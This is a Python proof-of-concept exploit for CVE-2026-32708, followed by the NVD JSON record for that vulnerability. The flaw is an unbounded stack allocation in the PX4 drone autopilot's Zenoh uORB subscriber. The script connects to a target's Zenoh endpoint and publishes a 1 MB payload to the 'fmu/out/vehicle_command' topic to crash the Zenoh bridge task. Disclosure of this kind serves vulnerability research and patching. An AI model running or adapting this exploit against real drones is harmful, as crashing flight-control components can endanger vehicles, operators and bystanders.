CVE-2026-32708

# CVE-2026-32708 PoC - PX4 Autopilot Zenoh uORB Stack Overflow # This PoC demonstrates sending a malicious oversized fragmented Zenoh message import zenoh import struct import time def create_malicious_zenoh_message(): """ Create a malicious oversized fragmented Zenoh message to trigger stack overflow in Zenoh uORB subscriber """ # Maximum payload size to trigger stack overflow # Adjust based on target system's stack size MALICIOUS_PAYLOAD_SIZE = 1024 * 1024 # 1MB - exceeds typical stack size # Create oversized payload malicious_payload = b'\x41' * MALICIOUS_PAYLOAD_SIZE # Zenoh message structure for fragmented message zenoh_header = bytes([0x71]) # Z_ZMSG_FLAG_Z zenoh_fragment = zenoh_header + malicious_payload return zenoh_fragment def exploit_cve_2026_32708(target_host='192.168.1.1', target_port=7447): """ Exploit function to trigger the vulnerability """ try: # Create Zenoh session with malicious configuration config = zenoh.Config() config.insert_json5("connect/endpoints", f'["tcp/{target_host}:{target_port}"]') session = zenoh.open(config) # Create malicious message malicious_msg = create_malicious_zenoh_message() # Publish to uORB topic that Zenoh bridge subscribes to key_expr = "fmu/out/vehicle_command" print(f"[*] Sending malicious message ({len(malicious_msg)} bytes) to {key_expr}") session.put(key_expr, malicious_msg) # Wait for message processing time.sleep(2) print("[*] Message sent. If vulnerable, Zenoh bridge should crash.") session.close() except Exception as e: print(f"[!] Error: {e}") return False return True if __name__ == "__main__": print("CVE-2026-32708 PoC - PX4 Autopilot Zenoh uORB Stack Overflow") print("=" * 60) exploit_cve_2026_32708()

{"cve": {"id": "CVE-2026-32708", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:41.960", "lastModified": "2026-03-17T16:16:23.157", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "PX4 autopilot is a flight control solution for drones. Prior to 1.17.0-rc2, the Zenoh uORB subscriber allocates a stack VLA directly from the incoming payload length without bounds. A remote Zenoh publisher can send an oversized fragmented message to force an unbounded stack allocation and copy, causing a stack overflow and crash of the Zenoh bridge task. This vulnerability is fixed in 1.17.0-rc2."}, {"lang": "es", "value": "El piloto automático PX4 es una solución de control de vuelo para drones. Antes de la versión 1.17.0-rc2, el suscriptor Zenoh uORB asigna una VLA de pila directamente de la longitud de la carga útil entrante sin límites. Un publicador Zenoh remoto puede enviar un mensaje fragmentado de tamaño excesivo para forzar una asignación y copia de pila sin límites, causando un desbordamiento de pila y el bloqueo de la tarea del puente Zenoh. Esta vulnerabilidad se corrige en la versión 1.17.0-rc2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dronecode:px4_drone_autopilot:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.17.0", "matchCriteriaId": "2FC2D6F1-D77D-44C2-A99C-55CB5A4474B9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dronecode:px4_drone_autopilot:1.17.0:alpha1:*:*:*:*:*:*", "matchCriteriaId": "033A0A82-2986-44D5-A712-47B8D43407FF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dronecode:px4_drone_autopilot:1.17.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "3F2EA96E-BC3A-42AB-B81B-53D5872B2296"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dronecode:px4_drone_autopilot:1.17.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "1EAC5320-8D94-477D-AB85-144F8218DDFB"}]}]}], "references": [{"url": "https://github.com/PX4/PX4-Autopilot/security/advisories/GHSA-69g4-hcqf-j45p", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/PX4/PX4-Autopilot/security/advisories/GHSA-69g4-hcqf-j45p", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}